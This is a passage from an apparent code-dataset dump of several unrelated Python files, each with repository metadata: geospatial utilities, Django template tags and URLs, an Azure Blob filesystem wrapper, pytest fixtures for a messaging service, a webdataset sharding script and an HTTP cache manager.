status_dict["user"] = frappe._dict(doctype="User", name=status_dict["user"])
status = status_dict.get("status")
if status in VERIFY_OTP_STATUS_MAP:
status_dict.status = VERIFY_OTP_STATUS_MAP[status]
else:
status_dict.status = "FAILED"
return status_dict
| 29.538462 | 84 | 0.703993 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 244 | 0.211806 |
658d5e23890b80d2c423a20bb23bdcaa811dcbe7 | 6,050 | py | Python | solaris/utils/core.py | mananeau/solaris | ca000e8a255bd792ff3f192a6350ff8cace3d050 | ["Apache-2.0"] | null | null | null | solaris/utils/core.py | mananeau/solaris | ca000e8a255bd792ff3f192a6350ff8cace3d050 | ["Apache-2.0"] | null | null | null | solaris/utils/core.py | mananeau/solaris | ca000e8a255bd792ff3f192a6350ff8cace3d050 | ["Apache-2.0"] | null | null | null |
import os
import numpy as np
from shapely.wkt import loads
from shapely.geometry import Point
from shapely.geometry.base import BaseGeometry
import pandas as pd
import geopandas as gpd
import rasterio
import skimage
from fiona._err import CPLE_OpenFailedError
from fiona.errors import DriverError
from warnings import warn
import pdb
def _check_rasterio_im_load(im):
"""Check if `im` is already loaded in; if not, load it in."""
if isinstance(im, str):
return rasterio.open(im)
elif isinstance(im, rasterio.DatasetReader):
return im
else:
raise ValueError(
"{} is not an accepted image format for rasterio.".format(im))
def _check_skimage_im_load(im):
"""Check if `im` is already loaded in; if not, load it in."""
if isinstance(im, str):
return skimage.io.imread(im)
elif isinstance(im, np.ndarray):
return im
else:
raise ValueError(
"{} is not an accepted image format for scikit-image.".format(im))
def _check_df_load(df):
"""Check if `df` is already loaded in, if not, load from file."""
if isinstance(df, str):
if df.lower().endswith('json'):
return _check_gdf_load(df)
else:
return pd.read_csv(df)
elif isinstance(df, pd.DataFrame):
return df
else:
raise ValueError(f"{df} is not an accepted DataFrame format.")
def _check_gdf_load(gdf):
"""Check if `gdf` is already loaded in, if not, load from geojson."""
if isinstance(gdf, str):
# as of geopandas 0.6.2, using the OGR CSV driver requires some add'nal
# kwargs to create a valid geodataframe with a geometry column. see
# https://github.com/geopandas/geopandas/issues/1234
if gdf.lower().endswith('csv'):
return gpd.read_file(gdf, GEOM_POSSIBLE_NAMES="geometry",
KEEP_GEOM_COLUMNS="NO")
try:
return gpd.read_file(gdf)
except (DriverError, CPLE_OpenFailedError):
warn(f"GeoDataFrame couldn't be loaded: either {gdf} isn't a valid"
" path or it isn't a valid vector file. Returning an empty"
" GeoDataFrame.")
return gpd.GeoDataFrame()
elif isinstance(gdf, gpd.GeoDataFrame):
return gdf
else:
raise ValueError(f"{gdf} is not an accepted GeoDataFrame format.")
def _check_geom(geom):
"""Check if a geometry is loaded in.
Returns the geometry if it's a shapely geometry object. If it's a wkt
string or a list of coordinates, convert to a shapely geometry.
"""
if isinstance(geom, BaseGeometry):
return geom
elif isinstance(geom, str): # assume it's a wkt
return loads(geom)
elif isinstance(geom, list) and len(geom) == 2: # coordinates
return Point(geom)
def _check_crs(input_crs):
"""Convert CRS to the integer format passed by ``solaris``."""
if isinstance(input_crs, dict):
# assume it's an {'init': 'epsgxxxx'} dict
out_crs = int(input_crs['init'].lower().strip('epsg:'))
out_crs = rasterio.crs.CRS.from_epsg(out_crs)
elif isinstance(input_crs, str):
#pdb.set_trace()
# handle PROJ4 strings, epsg strings, wkt strings
# but FIRST, see if it's just a number represented as a string
try:
input_crs = int(input_crs)
out_crs = rasterio.crs.CRS.from_epsg(input_crs)
except ValueError:
try:
out_crs = rasterio.crs.CRS.from_string(input_crs)
except rasterio.errors.CRSError as e:
raise ValueError(
f"Solaris doesn't know how to parse {input_crs} as a "
"crs. Try re-formatting. If this is properly formatted, "
"open an issue in solaris's GitHub repository."
) from e
elif isinstance(input_crs, rasterio.crs.CRS):
out_crs = input_crs
elif isinstance(input_crs, int):
out_crs = rasterio.crs.CRS.from_epsg(input_crs)
elif input_crs is None:
out_crs = input_crs
else:
out_crs = input_crs
return out_crs
def get_data_paths(path, infer=False):
"""Get a pandas dataframe of images and labels from a csv.
This file is designed to parse image:label reference CSVs (or just image)
    for inference) as defined in the documentation. Briefly, these should be
CSVs containing two columns:
``'image'``: the path to images.
``'label'``: the path to the label file that corresponds to the image.
Arguments
---------
path : str
Path to a .CSV-formatted reference file defining the location of
training, validation, or inference data. See docs for details.
infer : bool, optional
If ``infer=True`` , the ``'label'`` column will not be returned (as it
is unnecessary for inference), even if it is present.
Returns
-------
df : :class:`pandas.DataFrame`
A :class:`pandas.DataFrame` containing the relevant `image` and `label`
information from the CSV at `path` (unless ``infer=True`` , in which
case only the `image` column is returned.)
"""
df = pd.read_csv(path)
if infer:
return df[['image']] # no labels in those files
else:
return df[['image', 'label']] # remove anything extraneous
def get_files_recursively(path, traverse_subdirs=False, extension='.tif'):
"""Get files from subdirs of `path`, joining them to the dir."""
if traverse_subdirs:
walker = os.walk(path)
path_list = []
for step in walker:
if not step[2]: # if there are no files in the current dir
continue
path_list += [os.path.join(step[0], fname)
for fname in step[2] if
fname.lower().endswith(extension)]
return path_list
else:
return [os.path.join(path, f) for f in os.listdir(path)
if f.endswith(extension)]
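# Illustrative-only sketch (not part of the original module): the CRS helper
# above accepts several input forms; all of the inputs below are hypothetical
# examples and should normalize to the same rasterio CRS object.
for crs_in in (4326, "4326", "EPSG:4326", {"init": "epsg:4326"}):
    print(crs_in, "->", _check_crs(crs_in))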
| 35.798817
| 79
| 0.624793
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,606
| 0.430744
|
658e190370f91502c18753af3de961237b0e0150
| 129
|
py
|
Python
|
model/__init__.py
|
Pearl-UTexas/DUST-net
|
debea05a04e9340109176c7803909b50f84892ba
|
[
"MIT"
] | null | null | null |
model/__init__.py
|
Pearl-UTexas/DUST-net
|
debea05a04e9340109176c7803909b50f84892ba
|
[
"MIT"
] | null | null | null |
model/__init__.py
|
Pearl-UTexas/DUST-net
|
debea05a04e9340109176c7803909b50f84892ba
|
[
"MIT"
] | null | null | null |
from .von_mises_stiefel import *
from .von_mises_fisher import *
from .model import *
from .metrics import *
from .loss import *
| 21.5
| 32
| 0.767442
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
658e27d4f55208e3b1fbe0a8174313df62d9c767
| 980
|
py
|
Python
|
blog_app/templatetags/blog_app_tags.py
|
axkiss/FirstBlog
|
dc4444c70c58647abf733f06bab963eadced646d
|
[
"Unlicense"
] | null | null | null |
blog_app/templatetags/blog_app_tags.py
|
axkiss/FirstBlog
|
dc4444c70c58647abf733f06bab963eadced646d
|
[
"Unlicense"
] | null | null | null |
blog_app/templatetags/blog_app_tags.py
|
axkiss/FirstBlog
|
dc4444c70c58647abf733f06bab963eadced646d
|
[
"Unlicense"
] | null | null | null |
from django import template
from blog_app.models import Post
from django.utils import timezone
register = template.Library()
@register.simple_tag(name='list_tags')
def get_list_tags(pos, cnt_head_tag, cnt_side_tag):
list_tags = Post.tag.most_common()
if pos == 'head':
return list_tags[:cnt_head_tag]
else:
return list_tags[cnt_head_tag:cnt_head_tag + cnt_side_tag]
@register.simple_tag(name='popular_posts')
def get_popular_posts(days, cnt_posts):
# if blog hasn't publications
if not Post.objects.last():
return ''
end_date = Post.objects.last().created_at
start_date = end_date - timezone.timedelta(days=days)
popular_posts = Post.objects.filter(
created_at__range=(start_date, end_date)).order_by('-views')[:cnt_posts]
# if no publications for a long time
if len(popular_posts) < cnt_posts:
popular_posts = Post.objects.order_by('-views', '-created_at')[:cnt_posts]
return popular_posts
| 32.666667
| 82
| 0.720408
| 0
| 0
| 0
| 0
| 848
| 0.865306
| 0
| 0
| 128
| 0.130612
|
658e58ab530a47e10043fd6372afe98be7d02d5f
| 3,941
|
py
|
Python
|
flow/core/azure_blob_filesystem.py
|
hwknsj/synergy_flow
|
aba8f57b2cbeeb0368a64eaa7e5369fcef0a3136
|
[
"BSD-3-Clause"
] | null | null | null |
flow/core/azure_blob_filesystem.py
|
hwknsj/synergy_flow
|
aba8f57b2cbeeb0368a64eaa7e5369fcef0a3136
|
[
"BSD-3-Clause"
] | 1
|
2016-10-03T18:48:15.000Z
|
2019-11-01T21:53:30.000Z
|
flow/core/azure_blob_filesystem.py
|
hwknsj/synergy_flow
|
aba8f57b2cbeeb0368a64eaa7e5369fcef0a3136
|
[
"BSD-3-Clause"
] | 1
|
2019-11-02T00:45:26.000Z
|
2019-11-02T00:45:26.000Z
|
__author__ = 'Bohdan Mushkevych'
from os import path
from azure.storage.blob import BlockBlobService
from flow.core.abstract_filesystem import AbstractFilesystem, splitpath
class AzureBlobFilesystem(AbstractFilesystem):
""" implementation of Azure Page Blob filesystem
https://docs.microsoft.com/en-us/azure/storage/blobs/storage-python-how-to-use-blob-storage#download-and-install-azure-storage-sdk-for-python"""
def __init__(self, logger, context, **kwargs):
super(AzureBlobFilesystem, self).__init__(logger, context, **kwargs)
try:
self.block_blob_service = BlockBlobService(account_name=context.settings['azure_account_name'],
account_key=context.settings['azure_account_key'])
except EnvironmentError as e:
self.logger.error('Azure Credentials are NOT valid. Terminating.', exc_info=True)
raise ValueError(e)
def __del__(self):
pass
def _azure_bucket(self, bucket_name):
if not bucket_name:
bucket_name = self.context.settings['azure_bucket']
return bucket_name
def mkdir(self, uri_path, bucket_name=None, **kwargs):
def _create_folder_file():
folder_key = path.join(root, '{0}_$folder$'.format(folder_name))
if not self.block_blob_service.exists(azure_bucket, folder_key):
self.block_blob_service.create_blob_from_text(azure_bucket, folder_key, '')
azure_bucket = self._azure_bucket(bucket_name)
root = ''
for folder_name in splitpath(uri_path):
root = path.join(root, folder_name)
_create_folder_file()
def rmdir(self, uri_path, bucket_name=None, **kwargs):
azure_bucket = self._azure_bucket(bucket_name)
for key in self.block_blob_service.list_blobs(azure_bucket, prefix='{0}/'.format(uri_path)):
self.block_blob_service.delete_blob(azure_bucket, key)
def rm(self, uri_path, bucket_name=None, **kwargs):
azure_bucket = self._azure_bucket(bucket_name)
self.block_blob_service.delete_blob(azure_bucket, uri_path)
def cp(self, uri_source, uri_target, bucket_name_source=None, bucket_name_target=None, **kwargs):
azure_bucket_source = self._azure_bucket(bucket_name_source)
azure_bucket_target = self._azure_bucket(bucket_name_target)
source_blob_url = self.block_blob_service.make_blob_url(azure_bucket_source, uri_source)
self.block_blob_service.copy_blob(azure_bucket_target, uri_target, source_blob_url)
def mv(self, uri_source, uri_target, bucket_name_source=None, bucket_name_target=None, **kwargs):
self.cp(uri_source, uri_target, bucket_name_source, bucket_name_target, **kwargs)
self.rm(uri_source, bucket_name_source)
def copyToLocal(self, uri_source, uri_target, bucket_name_source=None, **kwargs):
azure_bucket_source = self._azure_bucket(bucket_name_source)
with open(uri_target, 'wb') as file_pointer:
self.block_blob_service.get_blob_to_stream(azure_bucket_source, uri_source, file_pointer)
def copyFromLocal(self, uri_source, uri_target, bucket_name_target=None, **kwargs):
azure_bucket_target = self._azure_bucket(bucket_name_target)
with open(uri_source, 'rb') as file_pointer:
self.block_blob_service.create_blob_from_stream(azure_bucket_target, uri_target, file_pointer)
def exists(self, uri_path, bucket_name=None, exact=False, **kwargs):
azure_bucket = self._azure_bucket(bucket_name)
is_found = self.block_blob_service.exists(azure_bucket, uri_path)
if exact is False and is_found is False:
folder_name = '{0}_$folder$'.format(path.basename(uri_path))
folder_key = path.join(uri_path, folder_name)
is_found = self.block_blob_service.exists(azure_bucket, folder_key)
return is_found
| 49.886076
| 148
| 0.713524
| 3,762
| 0.95458
| 0
| 0
| 0
| 0
| 0
| 0
| 363
| 0.092109
|
658f10b8ae6eef666116cd8610e4111c0de53318
| 1,085
|
py
|
Python
|
asyncworker/types/registry.py
|
etandel/async-worker
|
3cd68e3e4dc3a32d35a4fa67bfd26cf2cfb7e01a
|
[
"MIT"
] | null | null | null |
asyncworker/types/registry.py
|
etandel/async-worker
|
3cd68e3e4dc3a32d35a4fa67bfd26cf2cfb7e01a
|
[
"MIT"
] | null | null | null |
asyncworker/types/registry.py
|
etandel/async-worker
|
3cd68e3e4dc3a32d35a4fa67bfd26cf2cfb7e01a
|
[
"MIT"
] | null | null | null |
from typing import Type, Any, Dict, Optional
class RegistryItem:
def __init__(self, type: Type, value: Any) -> None:
self.type = type
self.value = value
class TypesRegistry:
def __init__(self):
self.__data: Dict[Type, RegistryItem] = {}
self.__by_name: Dict[str, RegistryItem] = {}
def set(
self,
obj: Any,
type_definition: Type = None,
param_name: Optional[str] = None,
) -> None:
self.__data[obj.__class__] = RegistryItem(type=obj.__class__, value=obj)
if param_name:
self.__by_name[param_name] = RegistryItem(
type=obj.__class__, value=obj
)
def get(self, _type: Type, param_name: str = None) -> Optional[Any]:
if param_name:
try:
if self.__by_name[param_name].type == _type:
return self.__by_name[param_name].value
except KeyError:
return None
try:
return self.__data[_type].value
except KeyError:
return None
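# Illustrative-only usage sketch for the registry above (names and values are
# hypothetical, shown to demonstrate the type- and name-based lookups).
registry = TypesRegistry()
registry.set("a plain string")                        # keyed by its type (str)
registry.set(42, param_name="answer")                 # also retrievable by name
assert registry.get(str) == "a plain string"
assert registry.get(int, param_name="answer") == 42
assert registry.get(float) is None                    # unknown types return None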
| 27.820513
| 80
| 0.564055
| 1,034
| 0.952995
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
6590118b6d44f92c7d79cfaff34140de85d60254
| 591
|
py
|
Python
|
kpe/BertKPE/MyCode/functions/filer/filesaver.py
|
thunlp/COVID19IRQA
|
fe359ce12ce38fd74ccc004cc524ec6011580023
|
[
"MIT"
] | 32
|
2020-03-26T17:03:54.000Z
|
2021-09-10T08:30:48.000Z
|
kpe/BertKPE/MyCode/functions/filer/filesaver.py
|
thunlp/COVID19IRQA
|
fe359ce12ce38fd74ccc004cc524ec6011580023
|
[
"MIT"
] | 1
|
2020-04-06T16:35:12.000Z
|
2020-04-13T07:08:14.000Z
|
kpe/BertKPE/MyCode/functions/filer/filesaver.py
|
thunlp/COVID19IRQA
|
fe359ce12ce38fd74ccc004cc524ec6011580023
|
[
"MIT"
] | 6
|
2020-03-28T05:07:22.000Z
|
2021-03-04T01:46:00.000Z
|
from tqdm import tqdm
import json
import os
def save_jsonl(data_list, filename):
with open(filename, 'w', encoding='utf-8') as fo:
for data in data_list:
fo.write("{}\n".format(json.dumps(data)))
fo.close()
print("Success save file to %s \n" %filename)
def save_json(data_list, filename):
with open(filename, "w", encoding="utf-8") as f:
json.dump(data_list, f)
f.close()
print("Success save file to %s \n" %filename)
def check_or_create_folder(folder):
if not os.path.exists(folder):
os.mkdir(folder)
| 25.695652
| 53
| 0.620981
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 82
| 0.138748
|
6590b1b797014d04b65cb873f63aee28028c3c0f
| 6,563
|
py
|
Python
|
tests/conftest.py
|
HenryTraill/morpheus
|
6bc095a7734f5f4a48d8556006266bf60ecdba68
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
HenryTraill/morpheus
|
6bc095a7734f5f4a48d8556006266bf60ecdba68
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
HenryTraill/morpheus
|
6bc095a7734f5f4a48d8556006266bf60ecdba68
|
[
"MIT"
] | null | null | null |
import asyncio
import pytest
import re
import uuid
from aiohttp.test_utils import teardown_test_loop
from aioredis import create_redis
from arq import ArqRedis, Worker
from atoolbox.db import prepare_database
from atoolbox.db.helpers import DummyPgPool
from atoolbox.test_utils import DummyServer, create_dummy_server
from buildpg import Values, asyncpg
from morpheus.app.main import create_app
from morpheus.app.models import EmailSendModel, SendMethod
from morpheus.app.settings import Settings
from morpheus.app.views import get_create_company_id
from morpheus.app.worker import startup as worker_startup, worker_functions
from . import dummy_server
def pytest_addoption(parser):
parser.addoption('--reuse-db', action='store_true', default=False, help='keep the existing database if it exists')
pg_settings = dict(pg_dsn='postgres://postgres:waffle@localhost:5432/morpheus_test')
@pytest.fixture(scope='session', name='clean_db')
def _fix_clean_db(request):
# loop fixture has function scope so can't be used here.
settings = Settings(**pg_settings)
loop = asyncio.new_event_loop()
loop.run_until_complete(prepare_database(settings, not request.config.getoption('--reuse-db')))
teardown_test_loop(loop)
@pytest.fixture(name='db_conn')
async def _fix_db_conn(loop, settings, clean_db):
conn = await asyncpg.connect_b(dsn=settings.pg_dsn, loop=loop)
tr = conn.transaction()
await tr.start()
await conn.execute("set client_min_messages = 'log'")
yield conn
await tr.rollback()
await conn.close()
@pytest.yield_fixture
async def redis(loop, settings):
addr = settings.redis_settings.host, settings.redis_settings.port
redis = await create_redis(addr, db=settings.redis_settings.database, encoding='utf8', commands_factory=ArqRedis)
await redis.flushdb()
yield redis
redis.close()
await redis.wait_closed()
@pytest.fixture(name='dummy_server')
async def _fix_dummy_server(aiohttp_server):
ctx = {'mandrill_subaccounts': {}}
return await create_dummy_server(aiohttp_server, extra_routes=dummy_server.routes, extra_context=ctx)
@pytest.fixture
def settings(tmpdir, dummy_server: DummyServer):
return Settings(
**pg_settings,
auth_key='testing-key',
test_output=str(tmpdir),
pdf_generation_url=dummy_server.server_name + '/generate.pdf',
mandrill_key='good-mandrill-testing-key',
log_level='ERROR',
mandrill_url=dummy_server.server_name + '/mandrill',
mandrill_timeout=0.5,
host_name=None,
click_host_name='click.example.com',
messagebird_key='good-messagebird-testing-key',
messagebird_url=dummy_server.server_name + '/messagebird',
stats_token='test-token',
max_request_stats=10,
)
@pytest.fixture(name='cli')
async def _fix_cli(loop, test_client, settings, db_conn, redis):
async def pre_startup(app):
app.update(redis=redis, pg=DummyPgPool(db_conn))
app = create_app(settings=settings)
app.update(pg=DummyPgPool(db_conn), webhook_auth_key=b'testing')
app.on_startup.insert(0, pre_startup)
cli = await test_client(app)
cli.server.app['morpheus_api'].root = f'http://localhost:{cli.server.port}/'
return cli
@pytest.fixture
def send_email(cli, worker):
async def _send_message(status_code=201, **extra):
data = dict(
uid=str(uuid.uuid4()),
main_template='<body>\n{{{ message }}}\n</body>',
company_code='foobar',
from_address='Sender Name <sender@example.com>',
method='email-test',
subject_template='test message',
context={'message': 'this is a test'},
recipients=[{'address': 'foobar@testing.com'}],
)
# assert all(e in data for e in extra), f'{extra.keys()} fields not in {data.keys()}'
data.update(**extra)
r = await cli.post('/send/email/', json=data, headers={'Authorization': 'testing-key'})
assert r.status == status_code
await worker.run_check()
if len(data['recipients']) != 1:
return NotImplemented
else:
return re.sub(r'[^a-zA-Z0-9\-]', '', f'{data["uid"]}-{data["recipients"][0]["address"]}')
return _send_message
@pytest.fixture
def send_sms(cli, worker):
async def _send_message(**extra):
data = dict(
uid=str(uuid.uuid4()),
main_template='this is a test {{ variable }}',
company_code='foobar',
from_name='FooBar',
method='sms-test',
context={'variable': 'apples'},
recipients=[{'number': '07896541236'}],
)
# assert all(e in data for e in extra), f'{extra.keys()} fields not in {data.keys()}'
data.update(**extra)
r = await cli.post('/send/sms/', json=data, headers={'Authorization': 'testing-key'})
assert r.status == 201
await worker.run_check()
return data['uid'] + '-447896541236'
return _send_message
@pytest.yield_fixture(name='worker_ctx')
async def _fix_worker_ctx(settings, db_conn):
ctx = dict(settings=settings, pg=DummyPgPool(db_conn))
await worker_startup(ctx)
yield ctx
await asyncio.gather(ctx['session'].close(), ctx['mandrill'].close(), ctx['messagebird'].close())
@pytest.yield_fixture(name='worker')
async def _fix_worker(cli, worker_ctx):
worker = Worker(
functions=worker_functions, redis_pool=cli.server.app['redis'], burst=True, poll_delay=0.01, ctx=worker_ctx
)
yield worker
await worker.close()
@pytest.fixture(name='call_send_emails')
def _fix_call_send_emails(db_conn):
async def run(**kwargs):
base_kwargs = dict(
uid=str(uuid.uuid4()),
subject_template='hello',
company_code='test',
from_address='testing@example.com',
method=SendMethod.email_mandrill,
recipients=[],
)
m = EmailSendModel(**dict(base_kwargs, **kwargs))
company_id = await get_create_company_id(db_conn, m.company_code)
group_id = await db_conn.fetchval_b(
'insert into message_groups (:values__names) values :values returning id',
values=Values(
uuid=m.uid,
company_id=company_id,
message_method=m.method.value,
from_email=m.from_address.email,
from_name=m.from_address.name,
),
)
return group_id, company_id, m
return run
| 32.979899
| 118
| 0.666464
| 0
| 0
| 1,079
| 0.164407
| 5,637
| 0.858906
| 4,179
| 0.636751
| 1,298
| 0.197775
|
65914d3047a8283780b6e3edcde39dc7eb8ebb8b
| 477
|
py
|
Python
|
gratify_proj/gratify_proj/urls.py
|
ConnorH2582/grat_proj
|
f59b4a30ef0bef48b81fb75ade92af615b1e3e77
|
[
"MIT"
] | null | null | null |
gratify_proj/gratify_proj/urls.py
|
ConnorH2582/grat_proj
|
f59b4a30ef0bef48b81fb75ade92af615b1e3e77
|
[
"MIT"
] | null | null | null |
gratify_proj/gratify_proj/urls.py
|
ConnorH2582/grat_proj
|
f59b4a30ef0bef48b81fb75ade92af615b1e3e77
|
[
"MIT"
] | null | null | null |
from django.conf.urls import include, url
from django.contrib import admin
from django.views.generic import View
urlpatterns = [
url(r'^client/', include('client.urls', namespace = 'client', app_name = 'client')),
url(r'^app/', include('app.urls', namespace = 'app', app_name = 'app')),
url('', include('django.contrib.auth.urls', namespace='auth')),
url('', include('social.apps.django_app.urls', namespace='social')),
url(r'^admin/', include(admin.site.urls)),
]
| 31.8
| 85
| 0.685535
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 151
| 0.316562
|
659182ecb712f24f0371757649f6618c51a53b68
| 193
|
py
|
Python
|
Server/prediction/admin.py
|
mohanj098/Item-Price-Forecasting
|
14fc787ad4d9dcc6af03b43fa5e866cd254a99f5
|
[
"MIT"
] | null | null | null |
Server/prediction/admin.py
|
mohanj098/Item-Price-Forecasting
|
14fc787ad4d9dcc6af03b43fa5e866cd254a99f5
|
[
"MIT"
] | 2
|
2021-03-15T15:53:22.000Z
|
2021-05-03T09:32:34.000Z
|
Server/prediction/admin.py
|
mohanj098/Item-Price-Forecasting
|
14fc787ad4d9dcc6af03b43fa5e866cd254a99f5
|
[
"MIT"
] | 1
|
2021-05-04T15:35:06.000Z
|
2021-05-04T15:35:06.000Z
|
from django.contrib import admin
from prediction.models import product
from prediction.models import price
# Register your models here.
admin.site.register(product)
admin.site.register(price)
| 24.125
| 37
| 0.829016
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 28
| 0.145078
|
65923c69268087aca7de1d2a3dc4a13663164289
| 5,813
|
py
|
Python
|
imutils/big/make_shards.py
|
JacobARose/image-utils
|
aa0e005c0b4df5198d188b074f4e21f8d8f97962
|
[
"MIT"
] | null | null | null |
imutils/big/make_shards.py
|
JacobARose/image-utils
|
aa0e005c0b4df5198d188b074f4e21f8d8f97962
|
[
"MIT"
] | null | null | null |
imutils/big/make_shards.py
|
JacobARose/image-utils
|
aa0e005c0b4df5198d188b074f4e21f8d8f97962
|
[
"MIT"
] | null | null | null |
"""
imutils/big/make_shards.py
Generate one or more webdataset-compatible tar archive shards from an image classification dataset.
Based on script: https://github.com/tmbdev-archive/webdataset-examples/blob/7f56e9a8b978254c06aa0a98572a1331968b0eb3/makeshards.py
Added on: Sunday March 6th, 2022
Example usage:
python "/media/data/jacob/GitHub/image-utils/imutils/big/make_shards.py" \
--subsets=train,val,test \
--maxsize='1e9' \
--maxcount=50000 \
--shard_dir="/media/data_cifs/projects/prj_fossils/users/jacob/data/herbarium_2022/webdataset" \
--catalog_dir="/media/data_cifs/projects/prj_fossils/users/jacob/data/herbarium_2022/catalog" \
--debug
"""
import sys
import os
import os.path
import random
import argparse
from torchvision import datasets
import webdataset as wds
import numpy as np
import os
from typing import Optional, Tuple, Any, Dict
from tqdm import trange, tqdm
import tarfile
tarfile.DEFAULT_FORMAT = tarfile.GNU_FORMAT
import webdataset as wds
# from imutils.big.datamodule import Herbarium2022DataModule, Herbarium2022Dataset
from imutils.ml.data.datamodule import Herbarium2022DataModule, Herbarium2022Dataset
def read_file_binary(fname):
"Read a binary file from disk."
with open(fname, "rb") as stream:
return stream.read()
all_keys = set()
def prepare_sample(dataset, index, subset: str="train", filekey: bool=False) -> Dict[str, Any]:
image_binary, label, metadata = dataset[index]
key = metadata["catalog_number"]
assert key not in all_keys
all_keys.add(key)
xkey = key if filekey else "%07d" % index
sample = {"__key__": xkey,
"image.jpg": image_binary}
if subset != "test":
assert label == dataset.targets[index]
sample["label.cls"] = int(label)
return sample
def write_dataset(catalog_dir: Optional[str]=None,
shard_dir: Optional[str]=None,
subset="train",
maxsize=1e9,
maxcount=100000,
limit_num_samples: Optional[int]=np.inf,
filekey: bool=False,
dataset=None):
if dataset is None:
datamodule = Herbarium2022DataModule(catalog_dir=catalog_dir,
num_workers=4,
image_reader=read_file_binary,
remove_transforms=True)
datamodule.setup()
dataset = datamodule.get_dataset(subset=subset)
num_samples = len(dataset)
print(f"With subset={subset}, Total num_samples: {num_samples}")
if limit_num_samples < num_samples:
num_samples = limit_num_samples
print(f"Limiting this run to num_samples: {num_samples}")
indices = list(range(num_samples))
os.makedirs(shard_dir, exist_ok=True)
pattern = os.path.join(shard_dir, f"herbarium_2022-{subset}-%06d.tar")
with wds.ShardWriter(pattern, maxsize=maxsize, maxcount=maxcount) as sink:
for i in tqdm(indices, desc=f"idx(Total={num_samples})"):
sample = prepare_sample(dataset, index=i, subset=subset, filekey=filekey)
sink.write(sample)
return dataset, indices
def parse_args() -> argparse.Namespace:
parser = argparse.ArgumentParser("""Generate sharded dataset from supervised image dataset.""")
parser.add_argument("--subsets", default="train,val,test", help="which subsets to write")
parser.add_argument(
"--filekey", action="store_true", help="use file as key (default: index)"
)
parser.add_argument("--maxsize", type=float, default=1e9)
parser.add_argument("--maxcount", type=float, default=100000)
parser.add_argument(
"--shard_dir",
default="/media/data_cifs/projects/prj_fossils/users/jacob/data/herbarium_2022/webdataset",
help="directory where shards are written"
)
parser.add_argument(
"--catalog_dir",
default="/media/data_cifs/projects/prj_fossils/users/jacob/data/herbarium_2022/catalog",
help="directory containing csv versions of the original train & test metadata json files from herbarium 2022",
)
parser.add_argument("--debug", action="store_true", default=False,
help="Provide this boolean flag to produce a debugging shard dataset of only a maximum of 200 samples per data subset. [TODO] Switch to temp directories when this flag is passed.")
args = parser.parse_args()
return args
def main(args):
# args = parse_args()
assert args.maxsize > 10000000 # Shards must be a minimum of 10+ MB
assert args.maxcount < 1000000 # Shards must contain a maximum of 1,000,000 samples each
limit_num_samples = 200 if args.debug else np.inf
# if not os.path.isdir(os.path.join(args.data, "train")):
# print(f"{args.data}: should be directory containing ImageNet", file=sys.stderr)
# print(f"suitable as argument for torchvision.datasets.ImageNet(...)", file=sys.stderr)
# sys.exit(1)
# if not os.path.isdir(os.path.join(args.shards, ".")):
# print(f"{args.shards}: should be a writable destination directory for shards", file=sys.stderr)
# sys.exit(1)
subsets = args.subsets.split(",")
for subset in tqdm(subsets, leave=True, desc=f"Processing {len(subsets)} subsets"):
# print("# subset", subset)
dataset, indices = write_dataset(catalog_dir=args.catalog_dir,
shard_dir=args.shard_dir,
subset=subset,
maxsize=args.maxsize,
maxcount=args.maxcount,
limit_num_samples=limit_num_samples,
filekey=args.filekey)
CATALOG_DIR = "/media/data_cifs/projects/prj_fossils/users/jacob/data/herbarium_2022/catalog"
# SHARD_DIR = "/media/data_cifs/projects/prj_fossils/users/jacob/data/herbarium_2022/webdataset"
if __name__ == "__main__":
args = parse_args()
main(args)
written_files = os.listdir(args.shard_dir)
files_per_subset = {"train":[],
"val":[],
"test":[]}
for subset,v in files_per_subset.items():
files_per_subset[subset] = len([f for f in written_files if subset in f])
from rich import print as pp
print(f"SUCCESS! TARGET SHARD DIR CONTAINS THE FOLLOWING:")
pp(files_per_subset)
| 31.085561
| 188
| 0.732152
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,592
| 0.445897
|
65941982873c5bf22451352b6be11931a96f85a2
| 2,917
|
py
|
Python
|
wetterdienst/util/network.py
|
meteoDaniel/wetterdienst
|
106a2fa9f887983281a6886c15bb3a845850dfb7
|
[
"MIT"
] | null | null | null |
wetterdienst/util/network.py
|
meteoDaniel/wetterdienst
|
106a2fa9f887983281a6886c15bb3a845850dfb7
|
[
"MIT"
] | null | null | null |
wetterdienst/util/network.py
|
meteoDaniel/wetterdienst
|
106a2fa9f887983281a6886c15bb3a845850dfb7
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2018-2021, earthobservations developers.
# Distributed under the MIT License. See LICENSE for more info.
import os
from io import BytesIO
from typing import List, Optional, Union
from fsspec.implementations.cached import WholeFileCacheFileSystem
from fsspec.implementations.http import HTTPFileSystem
from wetterdienst.util.cache import (
FSSPEC_CLIENT_KWARGS,
WD_CACHE_DISABLE,
CacheExpiry,
cache_dir,
)
class NetworkFilesystemManager:
"""
Manage multiple FSSPEC instances keyed by cache expiration time.
"""
filesystems = {}
@staticmethod
def resolve_ttl(ttl: Union[int, CacheExpiry]):
ttl_name = ttl
ttl_value = ttl
if isinstance(ttl, CacheExpiry):
ttl_name = ttl.name
ttl_value = ttl.value
return ttl_name, ttl_value
@classmethod
def register(cls, ttl=CacheExpiry.NO_CACHE):
ttl_name, ttl_value = cls.resolve_ttl(ttl)
key = f"ttl-{ttl_name}"
real_cache_dir = os.path.join(cache_dir, "fsspec", key)
filesystem_real = HTTPFileSystem(use_listings_cache=True, client_kwargs=FSSPEC_CLIENT_KWARGS)
if WD_CACHE_DISABLE or ttl is CacheExpiry.NO_CACHE:
filesystem_effective = filesystem_real
else:
filesystem_effective = WholeFileCacheFileSystem(
fs=filesystem_real, cache_storage=real_cache_dir, expiry_time=ttl_value
)
cls.filesystems[key] = filesystem_effective
@classmethod
def get(cls, ttl=CacheExpiry.NO_CACHE):
ttl_name, ttl_value = cls.resolve_ttl(ttl)
key = f"ttl-{ttl_name}"
if key not in cls.filesystems:
cls.register(ttl=ttl)
